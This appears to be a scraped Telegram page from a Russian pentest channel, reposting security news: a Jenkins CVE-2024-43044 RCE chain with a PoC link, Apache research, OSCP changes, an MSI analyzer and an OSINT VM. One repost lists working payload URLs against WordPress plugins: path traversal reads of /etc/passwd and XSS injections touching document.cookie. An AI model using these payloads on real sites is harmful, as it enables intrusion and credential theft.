ch
Feedback
Fsecurity | HH

Fsecurity | HH

前往频道在 Telegram

👾 Канал про КБ и пентест Наш Discord: https://discord.gg/Eg8aDS7Hn7 ✉️ По сотрудничеству: @OxHaskar 🍩 Поддержать: https://www.donationalerts.com/r/xackapb

显示更多
2 062
订阅者
-124 小时
-57 天
-730 天
帖子存档
Repost from PurpleBear
CVE-2024-43044: From file read to RCE in Jenkins Опубликованы технические детали и эксплоит для уязвимости CVE-2024-43044 (оценка по CVSS=8.8) Path Traversal, приводящая к удаленному исполнению кода на серверах Jenkins. Суть баги заключается в том, что подключенный агент может читать произвольные файлы с контроллера, с помощью эксплуатации классического Path Traversal в ClassLoaderProxy#fetchJar библиотеки Remoting/Hudson library, который отвечает за получение jar файлов с контроллера на агенты. Получив возможность чтения файлов, можно проэксплуатировать CVE-2024-23897, с помощью которой атакующий может создать валидные "Remember me" cookie для аккаунта администратора, чтобы выполнять произвольный код через консоль Groovy (Jenkins Scripting Engine). Опубликованный эксплоит имеет несколько режимов работы для Inbound (JNLP) или SSH способов подключения агентов к контроллеру и автоматически выгружает хэши паролей всех пользователей в формате John The Ripper😎 Такиим образом, отломав тачку с агентом, атакующий получает возможность развивать атаку на сервер Jenkins и другие подключенные тачки с агентами. ⚙️ POC: https://github.com/convisolabs/CVE-2024-43044-jenkins 🪲 Уязвимые версии ПО: Jenkins до версии Jenkins 2.471 и LTS 2.452.4, LTS 2.462.1 ✅ Рекомендации: Патч уже доступен, необходимо обновиться до версии 32.471 и LTS 2.452.4, LTS 2.462.1

Repost from SHADOW:Group
🖊️Семантические уязвимости в серверах Apache В связи с недавно прошедшими мероприятиями и моим отпуском не было времени упом
🖊️Семантические уязвимости в серверах Apache В связи с недавно прошедшими мероприятиями и моим отпуском не было времени упомянуть некоторые крутые недавно опубликованные доклады. И к одному из таких относится ресерч старины Orange Tsai, в ходе которого было найдено сразу несколько CVE и различных мисконфигов в серверах Apache. Странно, что никто об этом еще не написал, так как материал очень интересный и я всем рекомендую ознакомиться с оригиналом по ссылке. Я также набросал несколько шаблонов для Nuclei на основе этого доклада, которые вы можете доработать или использовать как есть на своих целях (закину их в комменты под постом). #web #apache #cve

photo content

🔴 Ахтунг! Offensive Security обновили формат сдачи своего самого популярного экзамена OSCP! Начиная с 1го ноября 2024г. поль
🔴 Ахтунг! Offensive Security обновили формат сдачи своего самого популярного экзамена OSCP! Начиная с 1го ноября 2024г. пользователи имеют право обновить свой сертификат до версии OSCP+ (действителен 3 года), подтверждающий что данный человек сдал актуальную программу экзамена и ничего не забыл 🥲 Станет невозможным получить 10 дополнительных экзаменационных баллов за решение всех лабораторных работ. Помимо прочего, изменения в сдаче экзамена так же коснутся по части внутреннего пентеста Active Directory (подробнее на скриншоте). Стоимость обновления сертификата OSCP -> OSCP+ 200$ (до 1 апреля 2025 г., после - 799$).

Repost from Proxy Bar
Прекрасное в мире плагинов WordPress * simple-image-manipulator
/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd
activehelper-livehelp
/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&
amministrazione-aperta
/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd
anti-plagiarism
/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
buddypress-component-stats
/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd
dzs-videogallery
/wp-content/plugins/dzs-videogallery/admin/upload.php
e-search
/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
fancy-product-designer
/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php
hd-webplayer
/wp-content/plugins/hd-webplayer/playlist.php
localize-my-post
/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd

Repost from Caster
Релиз моей работы о безопасности уровня доступа компьютерной сети Caster - Nihilism Genre: Defensive Label: exploit.org Relea
Релиз моей работы о безопасности уровня доступа компьютерной сети Caster - Nihilism Genre: Defensive Label: exploit.org Release Date: 31.08.2024 Performed by: Caster Written by: Magama Bazarov Mastered by: Magama Bazarov Cover Man: Magama Bazarov (Sony ILCE-7M3, f/5.6, 1/3 sec) https://blog.exploit.org/caster-nihilism

Repost from RedTeam brazzers
Всем привет! Давным-давно появился инструмент msi_search, который создали mandiant для анализа установленных MSI-файлов на си
Всем привет! Давным-давно появился инструмент msi_search, который создали mandiant для анализа установленных MSI-файлов на системе. Впоследствии эти файлы можно было выкачать и проанализировать на предмет уязвимостей. Подобный вектор привеска достаточно не самый примитивный и обычный, однако, я не раз встречал интересные инсталляторы, которые нужно было как-то сломать :) Сам формат MSI предательски похож на формат SQL, что упрощало написание автоматизированного чекера на уязвимости. Так родился инструмент MyMSIAnalyzer , я научил его: - Обнаруживать оставленные учетные данные внутри MSI-файла - Анализировать CustomActions на предмет наличия действий, исполняемых от лица системы - Проверять возможность перезаписи CustomActions, что может использоваться как для повышения привилегий, так и закрепления - Проверка сигнатур (нужно в контексте MST Backdoor), а также отдельная программа для обнаружения GUI внутри MSI, ведь в таком случае возможно осуществить побег в cmd.exe через запуск explorer.exe Полный разбор MSI-файлов как вектора повышения привилегий я выложил на medium. Приятного чтения :))

Repost from Proxy Bar
CVE-2024-43044 Jenkins * WriteUP * POC exploit #jenkins

Repost from Kali Linux
⭐️ Kali Linux OSINT VM Виртуальная машина с 100+ инструментами OSINT. Виртуальная машина Kali Linux, ориентированная на иссле
⭐️ Kali Linux OSINT VM Виртуальная машина с 100+ инструментами OSINT. Виртуальная машина Kali Linux, ориентированная на исследования в области OSINT. Инструмент обладает широким функционалом и включает множество актуальных инструментов. Помимо программного обеспечения, в ней представлен обширный набор различных шпаргалок, браузерных расширений, а также других ресурсов, которые окажутся полезными в расследованиях и работе с Kali Linux. git clone https://github.com/midnit3Z0mbi3/Kali-Linux-OSINT-VM.git chmod +x *.sh sudo bash kali_osint_setup.sh bash kali_osint_tools_pipx.sh sudo bash snoint.sh bash go.sh 🖥 Github @linuxkalii